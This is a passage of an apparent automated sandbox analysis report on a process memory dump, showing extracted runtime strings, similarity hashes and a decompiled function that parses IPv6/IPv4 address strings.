                                                                                                                                                      0x01fd24cd
                                                                                                                                                      0x01fd24d0
                                                                                                                                                      0x01fd24d1
                                                                                                                                                      0x01fd24d4
                                                                                                                                                      0x01fd24d6
                                                                                                                                                      0x01fd24d9
                                                                                                                                                      0x01fd24d9
                                                                                                                                                      0x01fd24dc
                                                                                                                                                      0x01fd24df
                                                                                                                                                      0x01fd24e1
                                                                                                                                                      0x01fd24e7
                                                                                                                                                      0x01fd24e9
                                                                                                                                                      0x01fd24ec
                                                                                                                                                      0x01fd24ef
                                                                                                                                                      0x01fd24f2
                                                                                                                                                      0x01fd24f2
                                                                                                                                                      0x01fd24ef
                                                                                                                                                      0x01fd24e7
                                                                                                                                                      0x01fd24fa
                                                                                                                                                      0x01fd24ff
                                                                                                                                                      0x01fd2501
                                                                                                                                                      0x01fd2503
                                                                                                                                                      0x01fd2506
                                                                                                                                                      0x01fd250b
                                                                                                                                                      0x01f9eb8c
                                                                                                                                                      0x01f9eb93
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f9eb93
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f9eb99
                                                                                                                                                      0x01f9ec85
                                                                                                                                                      0x01f9ec85
                                                                                                                                                      0x01f9ec85
                                                                                                                                                      0x00000000

                                                                                                                                                      Strings
                                                                                                                                                      • RTL: Re-Waiting, xrefs: 01FD24FA
                                                                                                                                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01FD248D
                                                                                                                                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01FD24BD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                      • API String ID: 0-3177188983
                                                                                                                                                      • Opcode ID: c015c7ae654095d0ffb38879b9d948679d8200aaf4b4b67047fe66818fa35c4a
                                                                                                                                                      • Instruction ID: 603ae29aa05632830ad76e2e9360052b06ac5c0c235692252f73631b10647e54
                                                                                                                                                      • Opcode Fuzzy Hash: c015c7ae654095d0ffb38879b9d948679d8200aaf4b4b67047fe66818fa35c4a
                                                                                                                                                      • Instruction Fuzzy Hash: BA410A71A00705EBDB20EF68CD84F7A77B9EF45720F148605FA559B2C2D632E941C7A0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01FAFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E01FAFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01FAEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01FAEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01FA685D(_t167, 4) == 0) {
								if(E01FA685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01FA685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01FA685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01F88980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01F7DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01FAEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01FAEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                      0x01fafcd1
                                                                                                                                                      0x01fafcd6
                                                                                                                                                      0x01fafcd9
                                                                                                                                                      0x01fafcdc
                                                                                                                                                      0x01fafcdf
                                                                                                                                                      0x01fafce2
                                                                                                                                                      0x01fafce5
                                                                                                                                                      0x01fafce8
                                                                                                                                                      0x01fafceb
                                                                                                                                                      0x01fafced
                                                                                                                                                      0x01fafced
                                                                                                                                                      0x01fafcf3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafcfc
                                                                                                                                                      0x01fafcfe
                                                                                                                                                      0x01fafdc1
                                                                                                                                                      0x01fdecbd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeccc
                                                                                                                                                      0x01fdeccc
                                                                                                                                                      0x01fdecd2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdecdf
                                                                                                                                                      0x01fdece0
                                                                                                                                                      0x01fdece4
                                                                                                                                                      0x01fdeceb
                                                                                                                                                      0x01fdecee
                                                                                                                                                      0x01fdeca8
                                                                                                                                                      0x01fdeca8
                                                                                                                                                      0x01fdecaa
                                                                                                                                                      0x01fafd76
                                                                                                                                                      0x01fafd79
                                                                                                                                                      0x01fafdb4
                                                                                                                                                      0x01fafdb5
                                                                                                                                                      0x01fafdb6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafdb6
                                                                                                                                                      0x01fafd7e
                                                                                                                                                      0x01fdecfc
                                                                                                                                                      0x01fafe2f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafe2f
                                                                                                                                                      0x01fded08
                                                                                                                                                      0x01fded0f
                                                                                                                                                      0x01fded17
                                                                                                                                                      0x01fded1b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded1b
                                                                                                                                                      0x01fafd88
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafd94
                                                                                                                                                      0x01fafd99
                                                                                                                                                      0x01fafda1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafdb0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafdb0
                                                                                                                                                      0x01fdecbd
                                                                                                                                                      0x01fafdc7
                                                                                                                                                      0x01fafdcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafdd7
                                                                                                                                                      0x01fafde3
                                                                                                                                                      0x01fafe06
                                                                                                                                                      0x01fc1fe7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc1fef
                                                                                                                                                      0x01fc1ff0
                                                                                                                                                      0x01fc1ff4
                                                                                                                                                      0x01fc1ff7
                                                                                                                                                      0x01fc1ffa
                                                                                                                                                      0x01fc1ffd
                                                                                                                                                      0x01fc2000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdecf1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdecf1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafe06
                                                                                                                                                      0x01fafde8
                                                                                                                                                      0x01fafdec
                                                                                                                                                      0x01fafdef
                                                                                                                                                      0x01fafdf2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafdf2
                                                                                                                                                      0x01fafdcb
                                                                                                                                                      0x01fafd04
                                                                                                                                                      0x01fafd05
                                                                                                                                                      0x01fdec67
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdec6f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdec6f
                                                                                                                                                      0x01fafd13
                                                                                                                                                      0x01fafd3c
                                                                                                                                                      0x01fafd40
                                                                                                                                                      0x01fdec75
                                                                                                                                                      0x01fdec7a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdec8a
                                                                                                                                                      0x01fdec8a
                                                                                                                                                      0x01fdec90
                                                                                                                                                      0x01fdecb2
                                                                                                                                                      0x01fafd73
                                                                                                                                                      0x01fafd73
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafd73
                                                                                                                                                      0x01fdec95
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeca1
                                                                                                                                                      0x01fdeca4
                                                                                                                                                      0x01fdeca5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeca5
                                                                                                                                                      0x01fdec7a
                                                                                                                                                      0x01fafd4a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafd6e
                                                                                                                                                      0x01fafd6e
                                                                                                                                                      0x01fafd71
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafd71
                                                                                                                                                      0x01fafd4a
                                                                                                                                                      0x01fafd21
                                                                                                                                                      0x01fba3a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fba3a1
                                                                                                                                                      0x01fafd36
                                                                                                                                                      0x01fc200b
                                                                                                                                                      0x01fc2012
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc2018
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc2018
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fafd36
                                                                                                                                                      0x01fafe0f
                                                                                                                                                      0x01fafe16
                                                                                                                                                      0x01fba3ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fba3b3
                                                                                                                                                      0x01fba3b3
                                                                                                                                                      0x01fafe1f
                                                                                                                                                      0x01fded25
                                                                                                                                                      0x01fded86
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded91
                                                                                                                                                      0x01fded95
                                                                                                                                                      0x01fded95
                                                                                                                                                      0x01fded9a
                                                                                                                                                      0x01fdedad
                                                                                                                                                      0x01fdedb3
                                                                                                                                                      0x01fdedba
                                                                                                                                                      0x01fdedc4
                                                                                                                                                      0x01fdedc9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdedcc
                                                                                                                                                      0x01fded2a
                                                                                                                                                      0x01fded55
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded61
                                                                                                                                                      0x01fded66
                                                                                                                                                      0x01fded6e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded7d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded7d
                                                                                                                                                      0x01fded30
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fded3c
                                                                                                                                                      0x01fded43
                                                                                                                                                      0x01fded4b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fassign
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3965848254-0
                                                                                                                                                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                      • Instruction ID: d2f2cb8100af77b868a69a99b2a040054c5078c8bd814cde7ba8e4eb19fe2db0
                                                                                                                                                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                      • Instruction Fuzzy Hash: 7091D1B1D0020AEEDF25CF58C8856FEBBB4FF40704FA4806AD651AB252E7364A41CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%